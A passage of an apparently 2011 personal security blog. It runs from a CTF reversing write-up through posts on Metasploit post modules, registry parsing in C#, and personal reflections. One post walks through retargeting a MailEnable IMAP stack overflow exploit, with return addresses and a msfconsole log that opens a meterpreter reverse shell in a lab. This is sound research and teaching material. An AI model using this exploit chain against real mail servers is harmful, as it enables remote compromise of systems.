 .maxstack 3
 .locals init (
  class [mscorlib]System.Security.Cryptography.MD5 V_0,
  unsigned int8[] V_1,
  class [mscorlib]System.Text.StringBuilder V_2,
  int32 V_3,
  string V_4,
  bool V_5)
 IL_0000:  nop 
 IL_0001:  call class [mscorlib]System.Security.Cryptography.MD5 class [mscorlib]System.Security.Cryptography.MD5::Create()
 IL_0006:  stloc.0 
 IL_0007:  ldloc.0 
 IL_0008:  call class [mscorlib]System.Text.Encoding class [mscorlib]System.Text.Encoding::get_UTF8()
 IL_000d:  ldarg.0 
 IL_000e:  callvirt instance unsigned int8[] class [mscorlib]System.Text.Encoding::GetBytes(string)
 IL_0013:  callvirt instance unsigned int8[] class [mscorlib]System.Security.Cryptography.HashAlgorithm::ComputeHash(unsigned int8[])
 IL_0018:  stloc.1 
 IL_0019:  newobj instance void class [mscorlib]System.Text.StringBuilder::'.ctor'()
 IL_001e:  stloc.2 
 IL_001f:  ldc.i4.0 
 IL_0020:  stloc.3 
 IL_0021:  br.s IL_0041

 IL_0023:  nop 
 IL_0024:  ldloc.2 
 IL_0025:  ldloc.1 
 IL_0026:  ldloc.3 
 IL_0027:  ldelema [mscorlib]System.Byte
 IL_002c:  ldstr "x2"
 IL_0031:  call instance string unsigned int8::ToString(string)
 IL_0036:  callvirt instance class [mscorlib]System.Text.StringBuilder class [mscorlib]System.Text.StringBuilder::Append(string)
 IL_003b:  pop 
 IL_003c:  nop 
 IL_003d:  ldloc.3 
 IL_003e:  ldc.i4.1 
 IL_003f:  add 
 IL_0040:  stloc.3 
 IL_0041:  ldloc.3 
 IL_0042:  ldloc.1 
 IL_0043:  ldlen 
 IL_0044:  conv.i4 
 IL_0045:  clt 
 IL_0047:  stloc.s 5
 IL_0049:  ldloc.s 5
 IL_004b:  brtrue.s IL_0023

 IL_004d:  ldloc.2 
 IL_004e:  callvirt instance string object::ToString()
 IL_0053:  stloc.s 4
 IL_0055:  br.s IL_0057

 IL_0057:  ldloc.s 4
 IL_0059:  ret 
    } // end of method Program::GetMd5Hash

    // method line 3
    .method private static  hidebysig 
           default string EncryptString (string plainText, string Key)  cil managed 
    {
        // Method begins at RVA 0x2128
    } // end of method Program::EncryptString

    // method line 4
    .method private static  hidebysig 
           default string DecryptString (string cipherText, string Key)  cil managed 
    {
        // Method begins at RVA 0x228c
    } // end of method Program::DecryptString

    // method line 5
    .method public hidebysig  specialname  rtspecialname 
           instance default void '.ctor' ()  cil managed 
    {
        // Method begins at RVA 0x24c4
 // Code size 7 (0x7)
 .maxstack 8
 IL_0000:  ldarg.0 
 IL_0001:  call instance void object::'.ctor'()
 IL_0006:  ret 
    } // end of method Program::.ctor

  } // end of class fu.Program
}

I immediately notice that it stores an MD5 hash in a string, and another string that appears to in base64. Following the logic, I realised that it took the argument, md5'd it and compared the result to the stored md5 sum. If it matched, it would print the base64 string and tell you to fix it. Technically, you don't even need to know what the argument it is expecting is, but I wanted to be thorough. The md5sum is an md5sum of the string 'kc57' (one of the CTF admins @_kc57).



root@gits-and-shiggles:/home/upgraydd/Pictures# mono fu.exe kc57
WARNING: The runtime version supported by this application is unavailable.
Using default runtime: v1.1.4322
/cqhcfUx1LO/mUsiT5fV2WijYMEDdvsi/gh214qRVPfauxChLplgBDMHScj8v/PDYt1F03x1r4FAdNe2uP9iHeAsPqcwEWzw3WTk7UN0jQ0=
Fix me :P
root@gits-and-shiggles:/home/upgraydd/Pictures#

This string stumped me. I spent too much time on it and probably went every way I shouldn't have in order to figure it out. I never did.

I look forward to competing next year. TheLightCosine and I will probably team up for real and pwn some pants of.

My biggest hurdle in school

2011-09-20T23:42:00.000-06:00

I suck at being in school. I feel incredibly unproductive as my classes are very slow. Once the teacher starts going into things s/he has already gone over (many times in some cases), I become very frustrated at wasting my time listening to the same information, over and over again. This happens in AP classes as well, though to a smaller extent. I begin thinking about all the things I could be working on instead, I always have projects I am working on.

The problem is that I know that I could be working on far more intellectually satisfying things. I am better as a part-time student, when my full time job/hobby suffices. I spend a large chunk of my time doing security/programming research, which is the most fun and intellectually satisfying hobby I have found yet. Hopefully I will be getting paid for it soon, and that is even better.

I also do not do well "being taught to". Give me the book and let me figure it out for myself, it will be much faster than slow lectures. A 3 hour class in Art Appreciation is hell. I have a large disdain for "authority", and this can become very burdensome as well.

Enumerating microsoft keys on remote hosts using metasploit

2011-08-28T14:48:00.001-06:00

I wrote a new module for metasploit that can (theoretically) enumerate any Microsoft product key stored as a DigitalProductId (most microsoft products).

I only have tested against windows 7 ultimate as I don't have a SQL server, exchange server, or MS office stuffs lying around to test with. Any testing with these apps would be a appreciated and feedback is even more appreciated.

The metasploit ticket is here.

Inverting ebooks for better reading

2011-08-23T17:10:00.000-06:00

I like ebooks. I don't like staring at lightbulbs. Hopefully, this one-liner will help others with the same problems I have with black-on-white text ebooks.

pdf2ps foo.pdf - | convert - -negate bar.pdf

Enumerating hardware on remote systems running Windows with Metasploit

2011-08-23T14:17:00.000-06:00

At Arlington Computer Care where I work, I needed (really, just wanted) a way to enumerate the hardware drivers on an arbitrary host on the shops network. The reason is two-fold: We can pinpoint old drivers to the customer and we know what drivers to look for specifically when reloading a machine. Metasploit already has a rich API for gathering information from remote hosts, and since I wanted to perform this check from a Linux box, it was the most obvious choice for me. Plus, I have a lot of experience with it already.

Metasploit, however, did not have the functionality I wanted. To gather the hardware information from a remote host was going to entail writing a new post module, which I hadn't done before. I have written exploits in the past for, but no post modules. I found it was very fun and rewarding. It has been accepted into trunk for a week or two now, and here are the details on it.


msf  post(enum_devices) > info



       Name: Windows Hardware Enumeration

     Module: post/windows/gather/enum_devices

    Version: 13559

   Platform: Windows

       Arch: 

       Rank: Normal



Provided by:

  Brandon Perry



Description:

  Enumerate PCI hardware information from the registry. Please note 

  this script will run through registry subkeys such as: 'PCI', 

  'ACPI', 'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 

  'LEGACY'', LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; 

  it will take time to finish. It is recommended to run this module as 

  a background job.





msf  post(enum_devices) >

Some example output:


msf  exploit(handler) > use post/windows/gather/enum_devices 

msf  post(enum_devices) > set SESSION 1

SESSION => 1

msf  post(enum_devices) > run



[*] Enumerating hardware on WIN-684G41EV82S

^C[-] Post interrupted by the console user

[*] Post module execution completed

msf  post(enum_devices) > set VERBOSE true

VERBOSE => true

msf  post(enum_devices) > run



[*] Enumerating hardware on WIN-684G41EV82S

[*] Enumerating VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01

[*] Enumerating VEN_1274&DEV_1371&SUBSYS_13711274&REV_02

[*] Enumerating VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00

 ...snip for brevity...

[*] Enumerating VID_0E0F&PID_0003&MI_01



Device Information

==================



 Device Description                                               Driver Version  Class           Manufacturer                          Extra

 ------------------                                               --------------  -----           ------------                          -----

 LSI Adapter, SAS 3000 series, 8-port with 1068                   1.28.3.52       SCSIAdapter     LSI                                   

 VMware VMaudio (VMAUDIO) (WDM)                                   5.10.0.3506     MEDIA           VMware, Inc.                          

 VMware SVGA 3D (Microsoft Corporation - WDDM)                    7.14.1.42       Display         VMware, Inc.                          

 VMware VMCI Bus Device                                                           System          VMware, Inc.                          

 Standard Enhanced PCI to USB Host Controller                     6.1.7601.17586  USB             (Standard USB Host Controller)        

 PCI standard PCI-to-PCI bridge                                   6.1.7601.17514  System          (Standard system devices)             

 PCI Express standard Root Port                                   6.1.7601.17514  System          (Standard system devices)             

 PCI Express standard Root Port                                                   System          (Standard system devices)             

 Intel(R) PRO/1000 MT Network Connection                          8.4.1.1         Net             Intel                                 

 Intel 82371AB/EB PCI to ISA bridge (ISA mode)                    6.1.7601.17514  System          Intel                                 

 Intel(R) 82371AB/EB PCI to USB Universal Host Controller         6.1.7601.17586  USB             Intel                                 

 Intel 82443BX Pentium(R) II Processor to PCI Bridge              6.1.7601.17514  System          Intel                                 

 Intel 82443BX Pentium(R) II Processor to AGP Controller          6.1.7601.17514  System          Intel                                 

 Microsoft AC Adapter                                             6.1.7600.16385  Battery         Microsoft                             

 AMD Processor                                                    6.1.7600.16385  Processor       Advanced Micro Devices                AMD Phenom(tm) 9850 Quad-Core Processor

 ACPI Fixed Feature Button                                        6.1.7601.17514  System          (Standard system devices)             

 EISA programmable interrupt controller                           6.1.7601.17514  System          (Standard system devices)             

 System timer                                                     6.1.7601.17514  System          (Standard system devices)             

 Direct memory access controller                                  6.1.7601.17514  System          (Standard system devices)             

 Standard PS/2 Keyboard                                           6.1.7601.17514  Keyboard        (Standard keyboards)                  

 Printer Port                                                     6.1.7600.16385  Ports           (Standard port types)                 Printer Port (LPT1)

 Communications Port                                              6.1.7600.16385  Ports           (Standard port types)                 Communications Port (COM1)

 Communications Port                                              6.1.7600.16385  Ports           (Standard port types)                 Communications Port (COM2)

 Standard floppy disk controller                                  6.1.7600.16385  fdc             (Standard floppy disk controllers)    

 System speaker                                                   6.1.7601.17514  System          (Standard system devices)             

 PCI bus                                                          6.1.7601.17514  System          (Standard system devices)             

 Generic Bus                                                      6.1.7601.17514  System          (Standard system devices)             

 System CMOS/real time clock                                      6.1.7601.17514  System          (Standard system devices)             

 Motherboard resources                                            6.1.7601.17514  System          (Standard system devices)             

 VMware Pointing Device                                           12.4.0.6        Mouse           VMware, Inc.                          

 Microsoft ACPI-Compliant System                                  6.1.7601.17514  System          Microsoft                             

 Floppy disk drive                                                6.1.7600.16385  FloppyDisk      (Standard floppy disk drives)         

 HID-compliant mouse                                              6.1.7600.16385  Mouse           Microsoft                             

 CD-ROM Drive                                                     6.1.7601.17514  CDROM           (Standard CD-ROM drives)              HL-DT-ST DVD-RAM GSA-H55N ATA Device

 Printer Port Logical Interface                                   6.1.7601.17514  System          (Standard system devices)             LPT1

 IDE Channel                                                      6.1.7601.17514  hdc             (Standard IDE ATA/ATAPI controllers)  

 Microsoft ISATAP Adapter                                         6.1.7600.16385  Net             Microsoft                             

 Microsoft Teredo Tunneling Adapter                               6.1.7600.16385  Net             Microsoft                             

 ACPI x86-based PC                                                6.1.7600.16385  Computer        (Standard computers)                  

 File as Volume Driver                                            6.1.7600.16385  System          Microsoft                             

 Composite Bus Enumerator                                         6.1.7601.17514  System          Microsoft                             

 Microsoft Composite Battery                                      6.1.7600.16385  Battery         Microsoft                             

 Beep                                                                             LegacyDriver                                          

 CNG                                                                              LegacyDriver                                          

 LDDM Graphics Subsystem                                                          LegacyDriver                                          

 FAT12/16/32 File System Driver                                                                                                         

 Fs_Rec                                                                           LegacyDriver                                          

 KSecDD                                                                           LegacyDriver                                          

 KSecPkg                                                                          LegacyDriver                                          

 Link-Layer Topology Discovery Mapper I/O Driver                                  LegacyDriver                                          

 Msfs                                                                             LegacyDriver                                          

 msisadrv                                                                         LegacyDriver                                          

 NDProxy                                                                          LegacyDriver                                          

 NetBIOS Interface                                                                LegacyDriver                                          

 Npfs                                                                             LegacyDriver                                          

 Ntfs                                                                             LegacyDriver                                          

 Parvdm                                                                           LegacyDriver                                          

 Performance Counters for Windows Driver                                          LegacyDriver                                          

 PEAUTH                                                                           LegacyDriver                                          

 Link-Layer Topology Discovery Responder                                          LegacyDriver                                          

 Security Driver                                                                  LegacyDriver                                          

 Security Processor Loader Driver                                                 LegacyDriver                                          

 srvnet                                                                           LegacyDriver                                          

 TCP/IP Registry Compatibility                                                    LegacyDriver                                          

 udfs                                                                             LegacyDriver                                          

 VgaSave                                                                          LegacyDriver                                          

 vmhgfs                                                                           LegacyDriver                                          

 Memory Control Driver                                                            LegacyDriver                                          

 VMware Vista Physical Disk Helper                                                LegacyDriver                                          

 Storage volumes                                                                  LegacyDriver                                          

 Kernel Mode Driver Frameworks service                                            LegacyDriver                                          

 WFP Lightweight Filter                                                           LegacyDriver                                          

 Windows Socket 2.0 Non-IFS Service Provider Support Environment                  LegacyDriver                                          

 Microsoft System Management BIOS Driver                          6.1.7601.17514  System          (Standard system devices)             

 WAN Miniport (IKEv2)                                             6.1.7601.17514  Net             Microsoft                             

 WAN Miniport (L2TP)                                              6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (Network Monitor)                                   6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (IP)                                                6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (IPv6)                                              6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (PPPOE)                                             6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (PPTP)                                              6.1.7600.16385  Net             Microsoft                             

 WAN Miniport (SSTP)                                              6.1.7600.16385  Net             Microsoft                             

 Remote Desktop Device Redirector Bus                             6.1.7600.16385  System          Microsoft                             

 Terminal Server Keyboard Driver                                  6.1.7601.17514  System          (Standard system devices)             

 Terminal Server Mouse Driver                                     6.1.7601.17514  System          (Standard system devices)             

 Plug and Play Software Device Enumerator                         6.1.7601.17514  System          (Standard system devices)             

 UMBus Root Bus Enumerator                                        6.1.7601.17514  System          Microsoft                             

 Microsoft Virtual Drive Enumerator Driver                        6.1.7601.17514  System          (Standard system devices)             

 Volume Manager                                                   6.1.7601.17514  System          (Standard system devices)             

 Disk drive                                                       6.1.7600.16385  DiskDrive       (Standard disk drives)                VMware, VMware Virtual S SCSI Disk Device

 Generic volume                                                   6.1.7601.17514  Volume          Microsoft                             

 Generic volume shadow copy                                       6.1.7600.16385  VolumeSnapshot  Microsoft                             

 Microsoft Streaming Service Proxy                                6.1.7600.16385  MEDIA           Microsoft                             

 Microsoft Streaming Clock Proxy                                  6.1.7600.16385  MEDIA           Microsoft                             

 Microsoft Streaming Tee/Sink-to-Sink Converter                   6.1.7600.16385  MEDIA           Microsoft                             

 Microsoft Streaming Quality Manager Proxy                        6.1.7600.16385  MEDIA           Microsoft                             

 RAS Async Adapter                                                6.1.7600.16385  Net             Microsoft                             

 Microsoft Trusted Audio Drivers                                  6.1.7600.16385  MEDIA           Microsoft                             

 USB Root Hub                                                     6.1.7601.17586  USB             (Standard USB Host Controller)        

 Generic USB Hub                                                  6.1.7601.17586  USB             (Generic USB Hub)                     Port_#0002.Hub_#0001

 USB Composite Device                                             6.1.7601.17586  USB             (Standard USB Host Controller)        Port_#0001.Hub_#0001

 USB Input Device                                                 6.1.7601.17514  HIDClass        (Standard system devices)             0002.0000.0000.001.000.000.000.000.000



[*] Results saved in: /root/.msf4/loot/20110823151419_default_192.168.1.146_host.hardware_345918.txt

[*] Post module execution completed

msf  post(enum_devices) >

I am also working on a post module which enumerates popular software keys (office and windows keys atm).

Breaking MailEnable 2.34: A lesson in security featuring Metasploit, Immunity Debugger, and mona.py

2011-07-06T17:52:00.000-06:00

Not that this is any major feat, but I thought it would do as a nice primer to investigating bugs Immunity Debugger and mona.py and exploiting them with Metasploit.

I was researching a vulnerability today, Metasploit has a module called mailenable_login with a target of MailEnable 2.35. Doing some research into the exploit, it is a buffer overflow, and not just 2.35 is vulnerable to this bug. From the CVE:


Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.

This is a good thing, because after searching for about an hour, I hadn't found an installer for the 2.35 version. The official historical archive for the MailEnable releases has that release conspicuously missing. However, other reportedly vulnerable releases, such as 2.34 was available. I happily obliged and grabbed 2.34, in hopes I would be able to get it to work without too much effort.

Well, short story short, the target in the module didn't "just work" as I had hoped. But it did crash the server, which was interesting. I decided to look further. I am not very seasoned at this type of debugging, so the guys in #corelan on irc.freenode.net were my first stop for getting pushed in the right direction.

Up until now, I had been using WinDbg, a debugger offered by Microsft with their Driver development kit. corelanc0der offered some better advice, grab a copy of Immunity Debugger and mona.py. After installing Immunity Debugger, I dropped mona.py in the PyCommands folder in the Immunity Debugger folder in Program Files. This enables me to utilize the "swiss army knife" the corelan team developped to speed up exploit development. I don't fully understand it, but already can see it is quite powerful. The first thing I had to do was crash the service, in this case MEIMAPS.exe. I attached Immunity Debugger to the currently running MEIMAPS.exe (it is run as a service automagically at startup). I know how to crash it, just run the 2.35 target against, and bam.

Notice how EIP is the same address as the return address in the original 2.35 target...

So, that obviously doesn't work, we don't like access violations. Maybe mona.py can show us some better places to exploit this application. But in order to do this, I need to make a few changes to the original metasploit module. Open it up in your favorite text editor, I did it in vim, and change your sploit. Comment out the original and add your own.

Check out this rather old article with details on pattern_create(). This gives mona.py some data to work with that is comprehensible, easy to traverse, and gather information about. A really cool feature of mona.py is that it will generate a template for your exploit with offsets and return pointers used to execute arbitrary commands. All you do is fill in the blanks. Let's see what mona.py has to offer:

If mona.py finds somethings it thinks is useful, you will get a small popup with predefined templates in a drop down box. I chose the remote client (tcp) template. Another series of popup dialogs will popup, one meaningful, and another not so meangingful. The former is the remote port to listen on. The latter is the Exploit-db id. Ironically, due to a bug in Immunity debugger, your answer the in remote port box will carry over into the next box, the exploit db id box. You do not want this. Be sure to clear it out if you don't want to include the exploit-db id.

Anyways, enough with silly dialogs. When everything is said and done, inside C:\Program Files\Immunity Inc\Immunity Debugger\ will lie an exploit.rb file. This is your exploit module shell for Metasploit. Be sure to check it over, it may not be optimal, even if it does *work*.

Hmm, looks like it'll work. But what the fudge is CLBCATQ.DLL? We want something a little more standard than this. Luckily, mona.py has some tools specifically for this.
We know we want a jmp/push esp. push was denoted in the generated module. It works, but let's try a jmp first, it is what the first target uses, so it would be a little bit more straightforward and consistent.

Cool! We found 2 pointers in a pretty freaking stable place, MSVCP60.DLL. Let's take a closer look.

Cool, so we have one jmp and one push. Remember our original exploit.rb that mona.py generated for us? The return address that it defines in CLBCATQ.DLL (0x76ffcb51) can be replaced with either of these addresses (0x76095d68 is the push and 0x760a9d6e is the jmp) in MSVCP60.DLL. The two addresses are printed out to the screen right above the red text. The two lines each begin with an address and either of these will do. We need to dig into the metasploit framework now. We need to add the target, which should really work for more than just this 2.34 release. The CVE lists a few in the 2.3x range. I think it should hit all of them, but am willing to eat my words.

Your targets in the mailenable_login.rb module should look similar to this, depending on the return address you chose from MSVCP60.DLL. Let's test it. You need to uncomment out the sploit lines from before and remove your line you inserted with pattern_create(1000).



root@bperry-laptop:/home/bperry# msfconsole -L

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 710 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13108 updated today (2011.07.06)

msf > use exploit/windows/imap/mailenable_login 
msf exploit(mailenable_login) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(mailenable_login) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   MailEnable 2.35 Pro
   1   MailEnable 2.34 Pro


msf exploit(mailenable_login) > set TARGET 1
TARGET => 1
msf exploit(mailenable_login) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mailenable_login) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(mailenable_login) > show options

Module options (exploit/windows/imap/mailenable_login):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.105    yes       The target address
   RPORT  143              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.71     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   MailEnable 2.34 Pro


msf exploit(mailenable_login) > exploit

[*] Started reverse handler on 192.168.1.71:4444 
[*] Trying target MailEnable 2.34 Pro...
[*] Sending stage (752128 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.71:4444 -> 192.168.1.105:1037) at 2011-07-06 21:27:55 -0500

meterpreter > Success!
[-] Unknown command: Success!.
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
msf exploit(mailenable_login) > exit
root@bperry-laptop:/home/bperry#

Whee! I have submitted the patch to the metasploit guys here, it should be in trunk shortly. If you would like to play with this, you may download the relevant binaries from MailEnable themselves. Just not 2.35! Har har har...

This is cool.

2011-06-28T08:37:00.000-06:00

http://code.google.com/p/disruptor/

Disruptor - Concurrent Programming Framework

They claim a lot, would like to test.

I'm a jerk.

2011-05-22T12:18:00.000-06:00

I prefer being alone. I spend most of my time alone (well, physically) and on my computer doing some kind of research for whatever my current computer project is. It bothers my mom and I fear she worries about me. My sister asks why I don't go out to socialise or why I don't like people coming over to the house. I really can't explain it any other way than "I just don't like dealing with people". It exhausts me. The more people, the worse it is.

However, I am surrounded by the smartest people I know all day, through IRC channels mainly, but through blogs talking about the most super fringe use cases of software as well and through the Internet in general. I don't frequent any forums per se, I don't use much social media. IRC is really my preferred communication protocol.

Anyway, over the years, I have come to learn I am a jerk. During high school, I was often called an asshole (usually in a playful way though). One of my sisters favorite lines when I ask her to do something is "Why don't you learn to ask it not like a jerk?". I just brush it off because I have no idea what it means. Generally speaking, I don't know why what I do is perceived in such a manner. While playing a game of chess with a friend from high school, the topic of me being an asshole came up. To describe me, he said "But you are different kind of asshole, so it's ok". Again, I don't know what this really means, but apparently I am a distinct kind of asshole that can be tolerated. That is a nice thing to know.

During high school, I wasn't the most social person in the world, but I was in band and enjoyed the company of other bandmates. I didn't like the regiment like behaviour of the marching band though. I hated it. I would fail classes so that I couldn't march in the band. I loved concert band, however. It is the one thing I wish I had never stopped doing.

Apparently, because I never slept and I was in my room all the time on my computer, my parents thought I was doing drugs. Which drugs I don't know, but when I learned about this, I thought it was humorous. My grades during high school were also very poor. My parents were legitimately concerned about me graduating. I never was. Old high school friends now say that I hardly hung out with anyone outside of school and I was always talking about the cool stuff I was doing with my computer. I never noticed this and to be honest, I don't agree.

For about two years now, I have suspected I have Asperger's Syndrome. It would help explain a lot of things in my life (my "introvertedness", my interest in computers, my somewhat "odd" behaviour). I found the Wikipedia article on a whim and realised it described a lot of me. I see a psychiatrist for depression, and have discussed this with him. While at first he wasn't quite sure and was apprehensive, after a few meetings, he seems to be on the same page as me and encourages me to participate on sites like Wrong Planet.

While I find the active age group on the discussion boards younger than I would like, I do read it and find valuable information on social rules and stigmas that I didn't previously see or understand.

My whole life I always felt like I was different from everyone else, and couldn't quite place my finger on it. I don't think I will seek a diagnosis. It is nice, though, being able to put a form to what was once an unintelligible blob. Of course, this is just my personal opinion. By no means am I saying everyone should go self-diagnosing themselves. It took me about a year to get comfortable enough with the idea to discuss it with my mother.

New OpenDiagnostics Live CD Release :: 394 MB

2011-05-21T22:03:00.000-06:00

Removed wine, stupid idea to put on there.

Added mc, lftp, mdadm, a few others I can't remember off the top of my head.
Updated ClamAV to 0.97 and virus defs are good as of today.
Updated metasploit to latest SVN head
Updated kernel to latest and lucid is fully updated.

Download Here

I have been doing a lot of research into AutoIt scripting lately, as it would help tremendously at the repair shop. I have written up a few scripts to automate a few common chores such as msconfig'ing, fixing up performance options, and am in the process of writing a driver backup and general backup script. I hope to include these with some sort of easy way to use them on the root of the CD. The scripts will be compiled to executables, but the scripts will of course be made available, possibly in a google code repo. If you have any suggestions on what type of scripts you would like, or concerns about this possible change, feel free to express them in the comments

Fun finding things

2011-04-27T22:33:00.000-06:00

I found a neat way to use find today. If you want to do an inverse search (think grep -v, but in find), simply use '!'. For Example:


find . '!' -name '*.zip'

Find all files that don't end in .zip.

OpenVAS 4 has landed in UNSTABLE in OBS

2011-02-08T14:35:00.000-06:00

Add this to your sources.lst:

deb http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/ ./

Then you need to get the key and add it to apt:


wget http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v4/xUbuntu_10.10/Release.key
apt-key add Release.key
rm Release.key

Then just

apt-get update

Non-trivial key names

2011-02-01T23:27:00.000-06:00

It seems that you run into instances where someone working with the registry doesn't know quite how to use it. Well, let's start with some code first.

Say we have a regex to carve out the data we want:

Regex nk = new Regex(@"nk[\x2c|\x20]\x00.{7}\x01.{117}");

Chances are this data chunk will have a lot of junk at the end. Most key names as far as I can tell under < 65 characters long, but there are instances where a name legitimately runs longer than that. Here is one example:


It's not a root key!
Offset to Parent: 4145008
Number of Subkeys: 0
Offset to Subkey LF Blocks: 1061109567
Number of values: 1
Offset to value list: 4144959
Offset to security key: 7421704
Offset to classname: 1061109567
Offset to ?trash?: 1634757999
Name Length: 58 bytes
Classname Length: 0
Partial Name: C:|WINDOWS|Microsoft.NET|Framework|v3.5|AddInProcess3
Name: C:|WINDOWS|Microsoft.NET|Framework|v3.5|AddInProcess3

It's not a root key!
Offset to Parent: 4144959
Number of Subkeys: 0
Offset to Subkey LF Blocks: 1061109567
Number of values: 1
Offset to value list: 4144992
Offset to security key: 1061109592
Offset to classname: 4156278
Offset to ?trash?: 1231316033
Name Length: 20590 bytes
Classname Length: 28530
Partial Name: cess32,version="3.5.0.0",publicKeyToken="b77a5c561934

The first node key name has a length of 58 bytes. Pretty normal. But the second node key has a name 20590 bytes long. It also has to do with the .NET Framework. (*sigh* Microsoft...)

I can't carve out 20000 byte long chunks for each key node to satisfy the needs of names that shouldn't really be names, that would be crazy. It just so happened that this name was throwing an IndexOutOfrangeException. I decided I could use this to my advantage.

I could pick a sane number for the size of the regex that would get 90% of my key names and simply work around the longer names (in the short term at any rate).

My code ended up looking like this:


else if (i == (int)0x0048) //name length
{
 byte[] lengthBytes = new byte[dword]; //should only be a word length. not sure why I need to make this dword
 
 for (int k = 0;k<word;k++)
 {
  lengthBytes[k] = bs[i+k];
 }
 
 nameLength = BitConverter.ToInt32(lengthBytes, 0);
 
 Console.WriteLine(String.Format("Name Length: {0} bytes", nameLength.ToString()));
 
 i += word;
}

... //other else if's here

else if (i == (int)0x004C) //key name
{
 int length = nameLength;
 
 char[] blah = new char[length];
 
 for (int k = 0; k < length;k++)
 {
  try
  {
   blah[k] = (char)bs[i+k];
  }
  catch(Exception ex) 
  { 
   //sometimes you get stupid long names (someone not know inghow the registry works)
   //when this happens, we will just read what we can and return what we get. Doesn't have to
   //be perfect since we can load the full name at a later time when the user clicks the list item
   //for most names, this won't be needed.
   if (ex.GetType() == typeof(IndexOutOfRangeException))
   {
    Console.WriteLine("Partial Name: " + new string(blah));
    
    i += bs.Length - i;
    k = length;
    
    continue; 
   }
   else
    throw ex;
   
  }
 }
 
 Console.WriteLine("Name: " + new string(blah));
 
 i += bs.Length - i; //we are done.
}

I figure for a list of values, you won't be showing more than 100 or so characters until you pick the specific key out of the list and it loads the full details. At that point you can read the entire name and show it to the full user.

Windows Registry with Mono, pt2 - Node Keys

2011-01-31T14:51:00.000-06:00

I have had a bit more time on my hands to work on being able to read the registry without using advapi32.dll. Today I was able to hack up a small (incomplete) class for node keys that builds the framework for breaking apart and manipulating the data.

To start off, from this file, we can get the offsets we need to read to get the right data.


the nk-Record
=============

Offset Size Contents
0x0000 Word ID: ASCII-"nk" = 0x6B6E
0x0002 Word for the root-key: 0x2C, otherwise 0x20
0x0004 Q-Word write-date/time in windows nt notation
0x0010 D-Word Offset of Owner/Parent key
0x0014 D-Word number of sub-Keys
0x001C D-Word Offset of the sub-key lf-Records
0x0024 D-Word number of values
0x0028 D-Word Offset of the Value-List
0x002C D-Word Offset of the sk-Record
0x0030 D-Word Offset of the Class-Name
0x0044 D-Word Unused (data-trash)
0x0048 Word name-length
0x004A Word class-name length
0x004C ???? key-name

It's pretty straight forward. In every fragment, we can go to specific offsets and get the data we want. This ends up looking like this:


public NodeKey (string data)
{
 ASCIIEncoding enc = new ASCIIEncoding();
 
 byte[] bs = enc.GetBytes(data);
 
 //the lengths we will be working with.
 int word = 2;
 int dword = word+word; //double word
 int qword = dword+dword; //quad word
 
 for (int i = 0; i < bs.Length;)
 {
  //making sure it is nk
  if (i == (int)0x0000) //header
  {
   if ((int)bs[0] == 110)
   {
    if ((int)bs[1] == 107) 
    {
     i += word;
     continue;
    }
    else
    {
            throw new Exception("This may be a damaged nk block. If so, fix the header and try again.");
    }
   }
   else
   {
    
    throw new Exception("Not a nk");
   }
  }
  
  else if (i == (int)0x0002) //is it a root key?
          {
   if (bs[i] == (byte)0x2C)
   {
    //It's a root key!
    Console.WriteLine("It's a root key!");
    
   }
   else
   {
    //it's not a root key!
    Console.WriteLine("It's not a root key!");
   }
   
   i += word; //move up 2 elements
   continue;
  }
  
  else if (i == (int)0x0004) //timestamp in long smb form blegh
  {
   byte[] blah = new byte[qword];
   for (int k = 0;k<qword;k++)
   {
    blah[k] = bs[i+k];
   }
   
   i+= qword;
  }
  else if (i == (int)0x0010) //offset to parent
  {
   i += dword;
  }
  else if (i == (int)0x0014) //number of subkeys
  {
   i += dword;
  }
  else if (i == (int)0x001C) //offset to subkey lf blocks
  {
   i += dword;
  }
  else if (i == (int)0x0024) //number of values
  {
   i += dword;
  }
  else if (i == (int)0x0028) //offset of value list
  {
   i += dword;
  }
  else if (i == (int)0x002C) //offset to the sk block
  {
   i += dword;
  }
  else if (i == (int)0x0030) //offset to classname
  {
   i += dword;
  }
  else if (i == (int)0x0044) //this is trash supposedly
                {
   i += dword;
  }
  else if (i == (int)0x0048) //name length
  {
   i += word;
  }
  else if (i == (int)0x004A) //class name length
  {
   i += word;
  }
  else if (i == (int)0x004C) //key name
  {
   int length = bs.Length - i;
   
   char[] blah = new char[length];
   
   for (int k = 0; k < length;k++)
   {
    blah[k] = (char)bs[i+k];
   }
   
